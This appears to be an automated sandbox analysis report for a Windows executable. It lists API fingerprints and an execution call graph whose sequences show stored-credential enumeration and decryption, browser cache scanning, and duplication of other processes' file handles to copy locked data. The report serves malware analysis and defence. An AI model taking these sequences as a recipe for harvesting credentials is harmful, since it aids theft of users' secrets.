• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
• Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
• Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
• Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
• IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
• SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
• SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: ErrorLastRead
• String ID:
• API String ID: 4100373531-0
• Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
• Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
• Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
• Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
Uniqueness
Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 6.1%
Dynamic/Decrypted Code Coverage: 9.2%
Signature Coverage: 1.3%
Total number of Nodes: 2000
Total number of Limit Nodes: 71
                                                                                                                                                                    execution_graph 37491 44dea5 37492 44deb5 FreeLibrary 37491->37492 37493 44dec3 37491->37493 37492->37493 37494 4287c1 37495 4287d2 37494->37495 37526 429ac1 37494->37526 37497 428818 37495->37497 37498 42881f 37495->37498 37509 425711 37495->37509 37531 42013a 37497->37531 37559 420244 97 API calls 37498->37559 37499 4260dd 37558 424251 120 API calls 37499->37558 37504 4259da 37557 416760 11 API calls 37504->37557 37506 425ad6 37509->37504 37510 429a4d 37509->37510 37514 422aeb memset memcpy memcpy 37509->37514 37517 4260a1 37509->37517 37509->37526 37527 4259c2 37509->37527 37530 425a38 37509->37530 37547 4227f0 memset memcpy 37509->37547 37548 422b84 15 API calls 37509->37548 37549 422b5d memset memcpy memcpy 37509->37549 37550 422640 13 API calls 37509->37550 37552 4241fc 11 API calls 37509->37552 37553 42413a 90 API calls 37509->37553 37512 429a66 37510->37512 37513 429a9b 37510->37513 37560 415c56 11 API calls 37512->37560 37525 429a96 37513->37525 37562 416760 11 API calls 37513->37562 37514->37509 37556 415c56 11 API calls 37517->37556 37519 429a7a 37561 416760 11 API calls 37519->37561 37563 424251 120 API calls 37525->37563 37526->37506 37564 415c56 11 API calls 37526->37564 37527->37506 37551 415c56 11 API calls 37527->37551 37530->37527 37554 422640 13 API calls 37530->37554 37555 4226e0 12 API calls 37530->37555 37532 42014c 37531->37532 37535 420151 37531->37535 37574 41e466 97 API calls 37532->37574 37534 420162 37534->37509 37535->37534 37536 4201b3 37535->37536 37537 420229 37535->37537 37538 4201b8 37536->37538 37539 4201dc 37536->37539 37537->37534 37540 41fd5e 86 API calls 37537->37540 37565 41fbdb 37538->37565 37539->37534 37544 4201ff 37539->37544 37571 41fc4c 37539->37571 37540->37534 37544->37534 37545 42013a 97 API calls 37544->37545 37545->37534 37547->37509 37548->37509 
37549->37509 37550->37509 37551->37504 37552->37509 37553->37509 37554->37530 37555->37530 37556->37504 37557->37499 37558->37506 37559->37509 37560->37519 37561->37525 37562->37525 37563->37526 37564->37504 37566 41fbf8 37565->37566 37568 41fbf1 37565->37568 37579 41ee26 37566->37579 37570 41fc39 37568->37570 37589 4446ce 11 API calls 37568->37589 37570->37534 37575 41fd5e 37570->37575 37572 41ee6b 86 API calls 37571->37572 37573 41fc5d 37572->37573 37573->37539 37574->37535 37577 41fd65 37575->37577 37576 41fdab 37576->37534 37577->37576 37578 41fbdb 86 API calls 37577->37578 37578->37577 37580 41ee41 37579->37580 37581 41ee32 37579->37581 37590 41edad 37580->37590 37593 4446ce 11 API calls 37581->37593 37584 41ee3c 37584->37568 37587 41ee58 37587->37584 37595 41ee6b 37587->37595 37589->37570 37599 41be52 37590->37599 37593->37584 37594 41eb85 11 API calls 37594->37587 37596 41ee70 37595->37596 37597 41ee78 37595->37597 37652 41bf99 86 API calls 37596->37652 37597->37584 37600 41be6f 37599->37600 37601 41be5f 37599->37601 37607 41be8c 37600->37607 37631 418c63 memset memset 37600->37631 37630 4446ce 11 API calls 37601->37630 37604 41be69 37604->37584 37604->37594 37605 41bee7 37605->37604 37635 41a453 86 API calls 37605->37635 37607->37604 37607->37605 37608 41bf3a 37607->37608 37609 41bed1 37607->37609 37634 4446ce 11 API calls 37608->37634 37611 41bef0 37609->37611 37614 41bee2 37609->37614 37611->37605 37612 41bf01 37611->37612 37613 41bf24 memset 37612->37613 37615 41bf14 37612->37615 37632 418a6d memset memcpy memset 37612->37632 37613->37604 37620 41ac13 37614->37620 37633 41a223 memset memcpy memset 37615->37633 37619 41bf20 37619->37613 37621 41ac52 37620->37621 37622 41ac3f memset 37620->37622 37625 41ac6a 37621->37625 37636 41dc14 19 API calls 37621->37636 37623 41acd9 37622->37623 37623->37605 37627 41aca1 37625->37627 37637 41519d 37625->37637 37627->37623 37628 41acc0 memset 37627->37628 37629 41accd memcpy 37627->37629 37628->37623 37629->37623 
37630->37604 37631->37607 37632->37615 37633->37619 37634->37605 37636->37625 37640 4175ed 37637->37640 37648 417570 SetFilePointer 37640->37648 37643 41760a ReadFile 37644 417637 37643->37644 37645 417627 GetLastError 37643->37645 37646 4151b3 37644->37646 37647 41763e memset 37644->37647 37645->37646 37646->37627 37647->37646 37649 4175b2 37648->37649 37650 41759c GetLastError 37648->37650 37649->37643 37649->37646 37650->37649 37651 4175a8 GetLastError 37650->37651 37651->37649 37652->37597 37653 417bc5 37655 417c61 37653->37655 37659 417bda 37653->37659 37654 417bf6 UnmapViewOfFile CloseHandle 37654->37654 37654->37659 37657 417c2c 37657->37659 37665 41851e 20 API calls 37657->37665 37659->37654 37659->37655 37659->37657 37660 4175b7 37659->37660 37661 4175d6 FindCloseChangeNotification 37660->37661 37662 4175c8 37661->37662 37663 4175df 37661->37663 37662->37663 37664 4175ce Sleep 37662->37664 37663->37659 37664->37661 37665->37657 37666 4152c7 malloc 37667 4152e2 37666->37667 37668 4152ef 37666->37668 37670 416760 11 API calls 37668->37670 37670->37667 37671 415308 ??3@YAXPAX 37672 41276d 37673 41277d 37672->37673 37715 4044a4 LoadLibraryW 37673->37715 37675 412785 37707 412789 37675->37707 37723 414b81 37675->37723 37678 4127c8 37729 412465 memset ??2@YAPAXI 37678->37729 37680 4127ea 37741 40ac21 37680->37741 37685 412813 37759 40dd07 memset 37685->37759 37686 412827 37764 40db69 memset 37686->37764 37689 412822 37785 4125b6 ??3@YAXPAX 37689->37785 37691 40ada2 _wcsicmp 37693 41283d 37691->37693 37693->37689 37696 412863 CoInitialize 37693->37696 37769 41268e 37693->37769 37789 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37696->37789 37697 41296f 37791 40b633 37697->37791 37700 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37706 412957 37700->37706 37712 4128ca 37700->37712 37706->37689 37708 4128d0 TranslateAcceleratorW 37709 412941 GetMessageW 37708->37709 37708->37712 37709->37706 37709->37708 
37710 412909 IsDialogMessageW 37710->37709 37710->37712 37711 4128fd IsDialogMessageW 37711->37709 37711->37710 37712->37708 37712->37710 37712->37711 37713 41292b TranslateMessage DispatchMessageW 37712->37713 37714 41291f IsDialogMessageW 37712->37714 37713->37709 37714->37709 37714->37713 37716 4044f7 37715->37716 37717 4044cf GetProcAddress 37715->37717 37721 404507 MessageBoxW 37716->37721 37722 40451e 37716->37722 37718 4044e8 FreeLibrary 37717->37718 37719 4044df 37717->37719 37718->37716 37720 4044f3 37718->37720 37719->37718 37720->37716 37721->37675 37722->37675 37724 414b8a 37723->37724 37725 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37723->37725 37795 40a804 memset 37724->37795 37725->37678 37728 414b9e GetProcAddress 37728->37725 37730 4124e0 37729->37730 37731 412505 ??2@YAPAXI 37730->37731 37732 41251c 37731->37732 37734 412521 37731->37734 37817 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37732->37817 37806 444722 37734->37806 37740 41259b wcscpy 37740->37680 37822 40b1ab ??3@YAXPAX ??3@YAXPAX 37741->37822 37743 40ad76 37823 40aa04 37743->37823 37746 40ad4b 37746->37743 37835 40a9ce 37746->37835 37747 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37753 40ac5c 37747->37753 37749 40ace7 ??3@YAXPAX 37749->37753 37753->37743 37753->37746 37753->37747 37753->37749 37826 40a8d0 7 API calls 37753->37826 37827 4099f4 37753->37827 37755 40ada2 37756 40adc9 37755->37756 37758 40adaa 37755->37758 37756->37685 37756->37686 37757 40adb3 _wcsicmp 37757->37756 37757->37758 37758->37756 37758->37757 37841 40dce0 37759->37841 37761 40dd3a GetModuleHandleW 37846 40dba7 37761->37846 37765 40dce0 3 API calls 37764->37765 37766 40db99 37765->37766 37918 40dae1 37766->37918 37932 402f3a 37769->37932 37771 4126a8 37772 412766 37771->37772 37773 4126d3 _wcsicmp 37771->37773 37775 41270a 37771->37775 37966 4125f8 7 API calls 37771->37966 37772->37689 37772->37696 37773->37771 37775->37772 37935 411ac5 37775->37935 37786 4125da 37785->37786 37787 
Execution graph node/edge data (the rendered call graph is not recoverable from this page; each numbered node carries a code address and the Windows/CRT APIs called there, "N API calls" marks a callee the report collapsed, and "A->B" is an edge). Notable API call sequences recoverable from the node data, by address:

40bdb0: CredEnumerateW, then per entry wcslen, _wcsncoll, memset, memcpy, wcschr, _wcsnicmp, a call into 404423, LocalFree.
404423: library load (40a804), GetProcAddress, FreeLibrary, CryptUnprotectData.
40c274 / 40c2fd: FindFirstUrlCacheEntryW, FindNextUrlCacheEntryW with wcschr filtering of entries, GetLastError, FindCloseUrlCache; reached after a FindFirstFileW/FindNextFileW walk (40c1d3) with _wcsicmp.
40c3c3: RegOpenKeyExW, RegEnumValueW loop with _wcsupr, RegCloseKey. 405220: _mbscpy, _mbscat and eight GetProcAddress resolutions, each preceded by a call into 40b273.
40b2cc / 40b273 -> 40b58d: GetModuleHandleW, FindResourceW, LoadResource, SizeofResource, LockResource, memcpy (called before every GetProcAddress above and throughout the graph).
413d4c: CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, OpenProcess per process, GetModuleHandleW, GetProcAddress, CloseHandle.
40dd85: GetModuleFileNameW, CreateFileW, NtQuerySystemInformation, GetCurrentProcessId, process walk via 413d4c, _wcsicmp name checks, OpenProcess, GetCurrentProcess, DuplicateHandle, CloseHandle.
40e01e: OpenProcess, GetCurrentProcess, DuplicateHandle, GetFileSize, GetTempPathW or GetWindowsDirectoryW, GetTempFileNameW, CreateFileW, CreateFileMappingW, MapViewOfFile, WriteFile, UnmapViewOfFile, CloseHandle; the temporary copy is then read with SetFilePointerEx/ReadFile (406b90, 40e175, 40e2ab) under _wcsicmp, _memicmp, wcschr and _snwprintf matching, and removed with DeleteFileW (40e593).
40b6ef: GetFileAttributesW, CopyFileW to a temporary path, WideCharToMultiByte, parsing in 40bb98 (memcmp, MultiByteToWideChar, SystemTimeToFileTime, FileTimeToLocalFileTime, a call into 404423), DeleteFileW of the copy.
414c2e: SHGetSpecialFolderPathW, or RegOpenKeyExW, RegQueryValueExW, RegCloseKey, to obtain a folder path.
40d6f5, 40da80, 41443e: GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileIntW, LoadStringW, _itow (INI-style settings read and write).
40a83b: GetSystemDirectoryW, wcscat, LoadLibraryW.
403988: CreateFileW, GetFileTime, CompareFileTime. 403af5 / 40ae18 / 40ae51: FindFirstFileW, FindNextFileW, FindClose directory walks with wcscmp filtering.
40dc9c: EnumResourceNamesW (twice). 444972 / 40a7a0: GetVersionExW with memcmp.
4018db, 40ea13, 40969c, 409cdb, 401134: GetWindowPlacement, GetSystemMetrics, SetWindowPlacement, SendMessageW, LoadCursorW, SetCursor, CreateFontIndirectW, GetModuleHandleW, LoadIconW (window handling).
The listing is cut off after node 39214.
409236 39213->39214 39309 438552 39214->39309 39240 40951d 39240->39185 39260->39193 39261->39196 39262->39210 39359 4438b5 39263->39359 39265 44444c 39266 409215 39265->39266 39373 415a6d 39265->39373 39266->39213 39266->39240 39268 4442e6 11 API calls 39270 44469e 39268->39270 39269 444486 39271 4444b9 memcpy 39269->39271 39297 4444a4 39269->39297 39270->39266 39272 443d90 111 API calls 39270->39272 39377 415258 39271->39377 39272->39266 39274 444524 39275 444541 39274->39275 39276 44452a 39274->39276 39297->39268 39494 438460 39309->39494 39360 4438d0 39359->39360 39369 4438c9 39359->39369 39447 415378 memcpy memcpy 39360->39447 39369->39265 39374 415a77 39373->39374 39375 415a8d 39374->39375 39376 415a7e memset 39374->39376 39375->39269 39376->39375 39378 4438b5 11 API calls 39377->39378 39379 41525d 39378->39379 39379->39274 39506 41703f 39494->39506 39496 43847a 39497 43848a 39496->39497 39498 43847e 39496->39498 39507 41705c 39506->39507 39511 417044 39506->39511 39508 417075 39507->39508 39509 41707a 11 API calls 39507->39509 39508->39496 39509->39511 39510 416760 11 API calls 39512 417055 39510->39512 39511->39510 39511->39512 39512->39496 39633 413f4f 39606->39633 39609 413f37 K32GetModuleFileNameExW 39610 413f4a 39609->39610 39610->38492 39612 41396c wcschr 39611->39612 39614 413969 wcscpy 39611->39614 39612->39614 39615 41398e 39612->39615 39616 413a3a 39614->39616 39638 4097f7 wcslen wcslen _memicmp 39615->39638 39616->38492 39618 41399a 39619 4139a4 memset 39618->39619 39620 4139e6 39618->39620 39639 409dd5 GetWindowsDirectoryW wcscpy 39619->39639 39622 413a31 wcscpy 39620->39622 39623 4139ec memset 39620->39623 39622->39616 39640 409dd5 GetWindowsDirectoryW wcscpy 39623->39640 39624 4139c9 wcscpy wcscat 39624->39616 39626 413a11 memcpy wcscat 39626->39616 39628 413cb0 GetModuleHandleW 39627->39628 39629 413cda 39627->39629 39628->39629 39630 413cbf GetProcAddress 39628->39630 39631 413ce3 GetProcessTimes 39629->39631 39632 413cf6 39629->39632 
39630->39629 39631->38494 39632->38494 39634 413f2f 39633->39634 39635 413f54 39633->39635 39634->39609 39634->39610 39636 40a804 8 API calls 39635->39636 39637 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39636->39637 39637->39634 39638->39618 39639->39624 39640->39626 39641->38515 39642->38537 39644 409cf9 GetVersionExW 39643->39644 39645 409d0a 39643->39645 39644->39645 39645->38544 39645->38548 39646->38551 39647->38554 39648->38556 39649->38621 39651 40bba5 39650->39651 39695 40cc26 39651->39695 39654 40bd4b 39716 40cc0c 39654->39716 39659 40b2cc 27 API calls 39660 40bbef 39659->39660 39723 40ccf0 _wcsicmp 39660->39723 39662 40bbf5 39662->39654 39724 40ccb4 6 API calls 39662->39724 39664 40bc26 39665 40cf04 17 API calls 39664->39665 39666 40bc2e 39665->39666 39667 40bd43 39666->39667 39669 40b2cc 27 API calls 39666->39669 39668 40cc0c 4 API calls 39667->39668 39668->39654 39670 40bc40 39669->39670 39725 40ccf0 _wcsicmp 39670->39725 39672 40bc46 39672->39667 39673 40bc61 memset memset WideCharToMultiByte 39672->39673 39726 40103c strlen EntryPoint EntryPoint EntryPoint EntryPoint 39673->39726 39675 40bcc0 39676 40b273 27 API calls 39675->39676 39677 40bcd0 memcmp 39676->39677 39677->39667 39678 40bce2 39677->39678 39679 404423 38 API calls 39678->39679 39680 40bd10 39679->39680 39680->39667 39681 40bd3a LocalFree 39680->39681 39682 40bd1f memcpy 39680->39682 39681->39667 39682->39681 39683->38636 39684->38673 39685->38673 39686->38673 39687->38673 39688->38673 39689->38673 39690->38673 39691->38673 39692->38673 39693->38648 39694->38670 39727 4096c3 CreateFileW 39695->39727 39697 40cc34 39698 40cc3d GetFileSize 39697->39698 39699 40bbca 39697->39699 39700 40afcf 2 API calls 39698->39700 39699->39654 39707 40cf04 39699->39707 39701 40cc64 39700->39701 39728 40a2ef ReadFile 39701->39728 39703 40cc71 39729 40ab4a MultiByteToWideChar 39703->39729 39705 40cc95 FindCloseChangeNotification 39706 40b04b ??3@YAXPAX 39705->39706 
39706->39699 39708 40b633 ??3@YAXPAX 39707->39708 39709 40cf14 39708->39709 39735 40b1ab ??3@YAXPAX ??3@YAXPAX 39709->39735 39711 40bbdd 39711->39654 39711->39659 39712 40cf1b 39712->39711 39714 40cfef 39712->39714 39736 40cd4b 39712->39736 39715 40cd4b 14 API calls 39714->39715 39715->39711 39717 40b633 ??3@YAXPAX 39716->39717 39718 40cc15 39717->39718 39719 40aa04 ??3@YAXPAX 39718->39719 39720 40cc1d 39719->39720 39782 40b1ab ??3@YAXPAX ??3@YAXPAX 39720->39782 39722 40b7d4 memset CreateFileW 39722->38627 39722->38628 39723->39662 39724->39664 39725->39672 39726->39675 39727->39697 39728->39703 39730 40ab93 39729->39730 39731 40ab6b 39729->39731 39730->39705 39732 40a9ce 4 API calls 39731->39732 39733 40ab74 39732->39733 39734 40ab7c MultiByteToWideChar 39733->39734 39734->39730 39735->39712 39737 40cd7b 39736->39737 39770 40aa29 6 API calls 39737->39770 39739 40cef5 39740 40aa04 ??3@YAXPAX 39739->39740 39741 40cefd 39740->39741 39741->39712 39742 40cd89 39742->39739 39771 40aa29 6 API calls 39742->39771 39744 40ce1d 39772 40aa29 6 API calls 39744->39772 39746 40ce3e 39747 40ce6a 39746->39747 39773 40abb7 wcslen memmove 39746->39773 39748 40ce9f 39747->39748 39776 40abb7 wcslen memmove 39747->39776 39779 40a8d0 7 API calls 39748->39779 39751 40ce56 39774 40aa71 wcslen 39751->39774 39753 40ce8b 39777 40aa71 wcslen 39753->39777 39754 40ceb5 39780 40a8d0 7 API calls 39754->39780 39757 40ce5e 39775 40abb7 wcslen memmove 39757->39775 39758 40ce93 39778 40abb7 wcslen memmove 39758->39778 39762 40cecb 39781 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39762->39781 39764 40cedd 39765 40aa04 ??3@YAXPAX 39764->39765 39766 40cee5 39765->39766 39767 40aa04 ??3@YAXPAX 39766->39767 39768 40ceed 39767->39768 39769 40aa04 ??3@YAXPAX 39768->39769 39769->39739 39770->39742 39771->39744 39772->39746 39773->39751 39774->39757 39775->39747 39776->39753 39777->39758 39778->39748 39779->39754 39780->39762 39781->39764 39782->39722 39783->38689 39784->38696 39785 4415ea 39793 4304b2 
39785->39793 39787 4415fe 39788 442bd4 39787->39788 39789 4418e2 39787->39789 39790 4418ea 39787->39790 39788->39790 39841 441409 memset 39788->39841 39789->39790 39840 4414a9 12 API calls 39789->39840 39842 43041c 12 API calls 39793->39842 39795 4304cd 39800 430557 39795->39800 39843 43034a 39795->39843 39797 4304f3 39797->39800 39847 430468 11 API calls 39797->39847 39799 430506 39799->39800 39801 43057b 39799->39801 39848 43817e 39799->39848 39800->39787 39802 415a91 memset 39801->39802 39804 430584 39802->39804 39804->39800 39853 4397fd memset 39804->39853 39806 4305e4 39806->39800 39854 4328e4 12 API calls 39806->39854 39808 43052d 39808->39800 39808->39801 39809 430542 39808->39809 39809->39800 39852 4169a7 11 API calls 39809->39852 39811 4305fa 39812 430609 39811->39812 39855 423383 11 API calls 39811->39855 39856 423330 11 API calls 39812->39856 39815 430634 39857 423399 11 API calls 39815->39857 39817 430648 39858 4233ae 11 API calls 39817->39858 39819 43066b 39859 423330 11 API calls 39819->39859 39821 43067d 39860 4233ae 11 API calls 39821->39860 39823 430695 39861 423330 11 API calls 39823->39861 39825 4306d6 39863 423330 11 API calls 39825->39863 39826 4306a7 39826->39825 39827 4306c0 39826->39827 39862 4233ae 11 API calls 39827->39862 39830 4306d1 39864 430369 17 API calls 39830->39864 39832 4306f3 39865 423330 11 API calls 39832->39865 39834 430704 39866 423330 11 API calls 39834->39866 39836 430710 39867 423330 11 API calls 39836->39867 39838 43071e 39868 423383 11 API calls 39838->39868 39840->39790 39841->39788 39842->39795 39844 43034e 39843->39844 39846 430359 39843->39846 39869 415c23 memcpy 39844->39869 39846->39797 39847->39799 39849 438187 39848->39849 39850 438192 39848->39850 39870 4380f6 39849->39870 39850->39808 39852->39800 39853->39806 39854->39811 39855->39812 39856->39815 39857->39817 39858->39819 39859->39821 39860->39823 39861->39826 39862->39830 39863->39830 39864->39832 39865->39834 39866->39836 39867->39838 39868->39800 
39869->39846 39873 43811f 39870->39873 39871 438164 39871->39850 39873->39871 39875 437e5e 39873->39875 39898 4300e8 memset memset memcpy 39873->39898 39899 437d3c 39875->39899 39877 437eb3 39877->39873 39878 437ea9 39878->39877 39883 437f22 39878->39883 39914 41f432 39878->39914 39881 437f06 39964 415c56 11 API calls 39881->39964 39885 437f7f 39883->39885 39886 432d4e 3 API calls 39883->39886 39884 437f95 39965 415c56 11 API calls 39884->39965 39885->39884 39887 43802b 39885->39887 39886->39885 39925 4165ff 39887->39925 39893 43806b 39894 438094 39893->39894 39966 42f50e 138 API calls 39893->39966 39896 437fa3 39894->39896 39967 4300e8 memset memset memcpy 39894->39967 39896->39877 39968 41f638 104 API calls 39896->39968 39898->39873 39900 437d69 39899->39900 39903 437d80 39899->39903 39969 437ccb 11 API calls 39900->39969 39902 437d76 39902->39878 39903->39902 39904 437da3 39903->39904 39905 437d90 39903->39905 39907 438460 134 API calls 39904->39907 39905->39902 39973 437ccb 11 API calls 39905->39973 39910 437dcb 39907->39910 39908 437de8 39972 424f26 123 API calls 39908->39972 39910->39908 39970 444283 13 API calls 39910->39970 39912 437dfc 39971 437ccb 11 API calls 39912->39971 39915 41f54d 39914->39915 39920 41f44f 39914->39920 39916 41f466 39915->39916 40003 41c635 memset memset 39915->40003 39916->39881 39916->39883 39920->39916 39923 41f50b 39920->39923 39974 41f1a5 39920->39974 39999 41c06f memcmp 39920->39999 40000 41f3b1 90 API calls 39920->40000 40001 41f398 86 API calls 39920->40001 39923->39915 39923->39916 40002 41c295 86 API calls 39923->40002 39926 4165a0 11 API calls 39925->39926 39927 41660d 39926->39927 39928 437371 39927->39928 39929 41703f 11 API calls 39928->39929 39930 437399 39929->39930 39931 43739d 39930->39931 39933 4373ac 39930->39933 40089 4446ea 11 API calls 39931->40089 39934 416935 16 API calls 39933->39934 39958 4373ca 39934->39958 39935 437584 39936 4375bc 39935->39936 40096 42453e 123 API calls 39935->40096 39939 415c7d 16 API 
calls 39936->39939 39937 438460 134 API calls 39937->39958 39940 4375d2 39939->39940 39942 4442e6 11 API calls 39940->39942 39944 4373a7 39940->39944 39941 4251c4 137 API calls 39941->39958 39943 4375e2 39942->39943 39943->39944 40097 444283 13 API calls 39943->40097 39944->39893 39947 415a91 memset 39947->39958 39949 43758f 40095 42453e 123 API calls 39949->40095 39952 4375f4 39956 437620 39952->39956 39957 43760b 39952->39957 39953 43759f 39955 416935 16 API calls 39953->39955 39955->39935 39960 416935 16 API calls 39956->39960 40098 444283 13 API calls 39957->40098 39958->39935 39958->39937 39958->39941 39958->39947 39958->39949 39963 437d3c 135 API calls 39958->39963 40090 425433 13 API calls 39958->40090 40091 425413 17 API calls 39958->40091 40092 42533e 16 API calls 39958->40092 40093 42538f 16 API calls 39958->40093 40094 42453e 123 API calls 39958->40094 39960->39944 39962 437612 memcpy 39962->39944 39963->39958 39964->39877 39965->39896 39966->39894 39967->39896 39968->39877 39969->39902 39970->39912 39971->39908 39972->39902 39973->39902 40004 41bc3b 39974->40004 39977 41edad 86 API calls 39978 41f1cb 39977->39978 39979 41f1f5 memcmp 39978->39979 39980 41f20e 39978->39980 39997 41f282 39978->39997 39979->39980 39981 41f21b memcmp 39980->39981 39980->39997 39983 41f23d 39981->39983 39991 41f326 39981->39991 39982 41ee6b 86 API calls 39982->39997 39984 41f28e memcmp 39983->39984 39983->39991 40028 41c8df 56 API calls 39983->40028 39985 41f2a9 39984->39985 39984->39991 39988 41f308 39985->39988 39989 41f2d8 39985->39989 39985->39991 39987 41f269 39987->39991 39992 41f287 39987->39992 39993 41f27a 39987->39993 39988->39991 40029 4446ce 11 API calls 39988->40029 39990 41ee6b 86 API calls 39989->39990 39994 41f2e0 39990->39994 39991->39982 39991->39997 39992->39984 39995 41ee6b 86 API calls 39993->39995 39998 41b1ca memset 39994->39998 39995->39997 39997->39920 39998->39997 39999->39920 40000->39920 40001->39920 40002->39915 40003->39916 40005 41be0b 
40004->40005 40007 41bc54 40004->40007 40016 41bd61 40005->40016 40038 41ae17 34 API calls 40005->40038 40007->40005 40007->40016 40018 41bc8d 40007->40018 40030 41baf0 55 API calls 40007->40030 40009 41be45 40009->39977 40009->39997 40011 41be04 40037 41aee4 56 API calls 40011->40037 40013 41bd42 40013->40011 40014 41bdd8 memset 40013->40014 40015 41bdba 40013->40015 40013->40016 40017 41bde7 memcmp 40014->40017 40027 4175ed 6 API calls 40015->40027 40016->40009 40039 41a25f memset 40016->40039 40017->40011 40020 41bdfd 40017->40020 40018->40013 40018->40016 40021 41bd18 40018->40021 40031 4151e3 40018->40031 40019 41bdcc 40019->40016 40019->40017 40036 41a1b0 memset 40020->40036 40021->40013 40021->40016 40035 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 40021->40035 40027->40019 40028->39987 40029->39991 40030->40018 40040 41837f 40031->40040 40034 444706 11 API calls 40034->40021 40035->40013 40036->40011 40037->40005 40038->40016 40039->40009 40041 4183c1 40040->40041 40045 4183ca 40040->40045 40087 418197 25 API calls 40041->40087 40044 4151f9 40044->40021 40044->40034 40045->40044 40061 418160 40045->40061 40046 4183e5 40046->40044 40070 41739b 40046->40070 40049 418444 CreateFileW 40051 418477 40049->40051 40050 41845f CreateFileA 40050->40051 40052 4184c2 memset 40051->40052 40053 41847e GetLastError ??3@YAXPAX 40051->40053 40073 418758 40052->40073 40055 4184b5 40053->40055 40056 418497 40053->40056 40088 444706 11 API calls 40055->40088 40059 41837f 49 API calls 40056->40059 40059->40044 40062 41739b GetVersionExW 40061->40062 40063 418165 40062->40063 40065 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 40063->40065 40066 418178 40065->40066 40067 41817f 40066->40067 40068 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 40066->40068 40067->40046 40069 418188 ??3@YAXPAX 40068->40069 40069->40046 40071 4173d6 40070->40071 40072 4173ad GetVersionExW 40070->40072 40071->40049 40071->40050 
40072->40071 40074 418680 43 API calls 40073->40074 40075 418782 40074->40075 40076 418506 ??3@YAXPAX 40075->40076 40077 418160 11 API calls 40075->40077 40076->40044 40078 418799 40077->40078 40078->40076 40079 41739b GetVersionExW 40078->40079 40080 4187a7 40079->40080 40083 4187da 40080->40083 40084 4187ad GetDiskFreeSpaceW 40080->40084 40082 4187ec GetDiskFreeSpaceA 40085 418800 ??3@YAXPAX 40082->40085 40083->40082 40086 4187e8 40083->40086 40084->40085 40085->40076 40086->40082 40087->40045 40088->40044 40089->39944 40090->39958 40091->39958 40092->39958 40093->39958 40094->39958 40095->39953 40096->39936 40097->39952 40098->39962 40099 4147f3 40102 414561 40099->40102 40101 414813 40103 41456d 40102->40103 40104 41457f GetPrivateProfileIntW 40102->40104 40107 4143f1 memset _itow WritePrivateProfileStringW 40103->40107 40104->40101 40106 41457a 40106->40101 40107->40106 40108 44def7 40109 44df07 40108->40109 40110 44df00 ??3@YAXPAX 40108->40110 40111 44df17 40109->40111 40112 44df10 ??3@YAXPAX 40109->40112 40110->40109 40113 44df27 40111->40113 40114 44df20 ??3@YAXPAX 40111->40114 40112->40111 40115 44df37 40113->40115 40116 44df30 ??3@YAXPAX 40113->40116 40114->40113 40116->40115 40117 4148b6 FindResourceW 40118 4148cf SizeofResource 40117->40118 40121 4148f9 40117->40121 40119 4148e0 LoadResource 40118->40119 40118->40121 40120 4148ee LockResource 40119->40120 40119->40121 40120->40121 40122 441b3f 40132 43a9f6 40122->40132 40124 441b61 40305 4386af memset 40124->40305 40126 44189a 40127 4418e2 40126->40127 40128 442bd4 40126->40128 40129 4418ea 40127->40129 40306 4414a9 12 API calls 40127->40306 40128->40129 40307 441409 memset 40128->40307 40133 43aa20 40132->40133 40134 43aadf 40132->40134 40133->40134 40135 43aa34 memset 40133->40135 40134->40124 40136 43aa56 40135->40136 40137 43aa4d 40135->40137 40308 43a6e7 40136->40308 40316 42c02e memset 40137->40316 40142 43aad3 40318 4169a7 11 API calls 40142->40318 40143 43aaae 40143->40134 40143->40142 40158 
